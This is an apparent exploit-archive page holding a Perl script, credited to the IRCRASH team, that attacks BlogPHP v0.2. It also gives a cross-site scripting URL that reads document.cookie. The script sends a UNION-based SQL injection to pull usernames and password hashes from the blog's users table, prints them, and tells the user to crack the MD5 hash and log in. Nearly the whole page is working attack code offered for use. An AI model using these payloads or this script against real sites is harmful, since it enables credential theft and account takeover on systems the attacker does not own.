exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

blogphp-sql.txt

blogphp-sql.txt
Posted Feb 4, 2008
Authored by IRCRASH | Site ircrash.com

BlogPHP version 0.2 remote SQL injection exploit along with cross site scripting vulnerability details.

tags | exploit, remote, xss, sql injection
SHA-256 | 95f01f12bf124722fa39346748ea9142c02379baafd96611ad611cb561b4cae6

blogphp-sql.txt

Change Mirror Download
#!/usr/bin/perl
#####################################################################################
#### BlogPHP V.2 ####
#### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) ####
#####################################################################################
# #
#AUTHOR : IRCRASH #
#Discovered by : Dr.Crash #
#Exploited By : Dr.Crash #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #
# #
#####################################################################################
# #
#Script Download : http://puzzle.dl.sourceforge.net/sourceforge/blogphpscript/BlogPHPv2.zip
# #
#####################################################################################
# < XSS > #
#XSS Address : http://Sitename/index.php?search=<script>alert(document.cookie);</script>
# #
#####################################################################################
# < SQL > #
#SQL Address : http://Sitename/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################

use LWP;
use HTTP::Request;
use Getopt::Long;


sub header
{
print "
****************************************************
* SBlogPHP v.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : Dr.Crash *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
}

sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}


my %parameter = ();
GetOptions(\%parameter, "url=s");

$url = $parameter{"url"};

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = "/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";

my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

#Debug Modus delete # at beginning of next line
#print $content;

@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];

@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Md5 Password And Login In : $url/login.html\n";
print "Enjoy My friend .....\n";

}

#Starting;
print "
****************************************************
* SBlogPHP v.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : Dr.Crash *
*Exploited by : Dr.Crash *
*Our Site : IRCRASH.COM *
****************************************************";
print "\n\nExploiting...\n";
Exploit();

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close